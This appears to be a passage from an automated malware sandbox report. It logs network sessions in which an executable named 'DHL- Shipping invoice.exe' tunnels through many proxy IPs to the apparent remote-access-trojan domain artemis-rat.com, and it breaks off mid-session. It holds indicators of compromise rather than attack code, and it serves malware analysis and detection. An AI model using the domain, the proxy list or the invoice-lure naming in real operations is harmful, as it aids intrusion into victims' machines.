                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            319192.168.2.45111223.137.248.197806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.139229059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            320192.168.2.45110951.75.126.150378476484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.142062902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            321192.168.2.45027192.204.135.203108246484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.143739939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.232131958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250556946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.252510071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            322192.168.2.45098852.196.1.182806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.143779039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.423664093 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:00.476829052 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 f0 06 1b 91 78 30 5e e8 44 10 f2 f1 3b 73 3a db 11 41 db ea da 61 54 e8 30 7b 29 f5 23 2b 85 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: lhex0^D;s:AaT0{)#+*,+0/$#('=<5/artemis-rat.com#.QoSd\I&S'f5-4|5T'P_p!x
                            Mar 12, 2024 08:37:00.757294893 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 9b 03 dc 45 0b 7f 9d e5 25 18 97 19 bf 9e 43 59 82 30 28 59 b4 9c e2 2b 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9E%CY0(Y+DOWNGRD0000*H010Uartemis-rat.com0240312070904Z260312070904Z010Uartemis-rat.com0"0*H0sr7vM
                            Mar 12, 2024 08:37:00.759109974 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 a8 f9 34 77 ef 69 0d 30 d2 47 21 6d 38 9a ef cf 40 15 cb 48 1a 4b 4c d5 20 fc 9e e4 34 d0 d4 34 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 36 e5 5e d7 66 e3 50 91 df f7 ae 8c b7 ee d5 86 5d d1 2b b6 ed
                            Data Ascii: %! 4wi0G!m8@HKL 44(6^fP]+VqQV
                            Mar 12, 2024 08:37:01.039524078 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 38 34 c6 9b 72 e4 53 9b 71 67 b7 2e 20 5c 7e c2 0c fd 26 68 6e ac 5e 6c de 69 94 90 57 27 c4 78 cc 64 03 7b b6 23 62 da
                            Data Ascii: (84rSqg. \~&hn^liW'xd{#b


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            323192.168.2.450891208.109.13.93537786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.149483919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.890377998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.027095079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.216845989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            324192.168.2.45113672.217.158.20241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.154309988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            325192.168.2.45095758.20.248.13990026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.159457922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.480400085 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            326192.168.2.450559199.229.254.12941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.166580915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            327192.168.2.451041200.41.148.2120006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.167929888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            328192.168.2.45034092.204.134.38307476484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.168725967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.250013113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250751019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250193119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            329192.168.2.4511185.252.23.22010816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.171931982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            330192.168.2.450155203.89.8.107806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.178863049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.232132912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.144680023 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.22.0
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            331192.168.2.450908103.120.6.46806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.185013056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            332192.168.2.45117745.12.31.3806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.186575890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.274004936 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            333192.168.2.451179104.22.50.220806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.186578989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.274255037 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            334192.168.2.451194172.65.165.93300006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.186758995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            335192.168.2.451199104.16.104.12806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.187119961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.274841070 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            336192.168.2.451202104.24.193.186806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.187591076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.275940895 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            337192.168.2.451209104.19.235.10806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.187928915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.275299072 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            338192.168.2.45111780.78.64.7041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.189158916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            339192.168.2.451214104.19.138.4806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.189244032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.276458979 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            340192.168.2.451233104.24.15.158806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.216924906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.305377007 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            341192.168.2.451231104.21.85.109806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217000961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.305443048 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            342192.168.2.451094168.0.239.22487876484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.217060089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
